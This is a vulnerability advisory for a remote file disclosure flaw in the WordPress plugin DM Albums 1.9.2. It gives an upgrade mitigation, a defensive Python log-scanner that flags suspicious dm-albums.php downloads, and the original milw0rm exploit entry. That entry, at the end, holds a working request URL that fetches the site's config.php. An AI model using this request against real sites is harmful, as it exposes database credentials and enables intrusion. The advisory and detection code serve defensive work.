Vendor: DM Albums
By: Stack
CVSS: 7.5 (HIGH)
Remote File Disclosure
CWE: 200
Product Name: DM Albums
Affected Version From: 1.9.2
Affected Version To: 1.9.2
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:dm_albums
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability

A vulnerability in WordPress Plugin DM Albums 1.9.2 allows an attacker to download the config.php file from the server by sending a specially crafted HTTP request.

Mitigation:

Upgrade to the latest version of the plugin.
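
To check whether a site saw requests of the kind described above, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for downloads through dm-albums.php that ask for something other than an image. The log format (Common/Combined), the image-extension allow-list and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Script path and parameter names are taken from the advisory.
PLUGIN_SCRIPT = "/wp-content/plugins/dm-albums/dm-albums.php"
# Assumption: legitimate album downloads are image files.
MEDIA_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")

# Common/Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, status, file, reason) for a suspicious download, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.group(1), m.group(2), int(m.group(3))
    raw_path, _, query = target.partition("?")
    # Decode and collapse repeated slashes so "//wp-content/..." still matches.
    path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
    if not path.endswith(PLUGIN_SCRIPT):
        return None
    params = parse_qs(query, keep_blank_values=True)  # values are percent-decoded
    if params.get("download", [""])[0].lower() != "yes":
        return None
    name = params.get("file", [""])[0]
    currdir = params.get("currdir", [""])[0]
    if ".." in name or ".." in currdir:
        return (ip, status, name, "parent-directory reference")
    if not name.lower().endswith(MEDIA_EXTENSIONS):
        return (ip, status, name, "non-media file")
    return None

def find_suspicious(lines):
    """Return the suspicious hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up paths and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2009:10:00:00 +0000] "GET /blog/wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=holiday.jpg&currdir=/wp-content/uploads/dm-albums/ HTTP/1.1" 200 48213',
    '198.51.100.7 - - [01/Jul/2009:10:02:11 +0000] "GET /blog//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/ HTTP/1.1" 200 612',
    '198.51.100.7 - - [01/Jul/2009:10:02:15 +0000] "GET /blog/wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=%63onfig.php&currdir=/wp-content/plugins/dm-albums/ HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jul/2009:10:03:00 +0000] "GET /blog/index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, status, name, reason in find_suspicious(SAMPLE_LOG):
        print(f"{ip} status={status} file={name!r} ({reason})")
```

A flagged request that returned status 200 means the server may have sent the file, so any credentials stored in it should be rotated after upgrading.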

Exploit-DB raw data:

#############################################################################################
[+] WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability
[+] Author : Stack
[+] Greetz : V4 Team & Sec R1z
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/
#############################################################################################

# milw0rm.com [2009-06-30]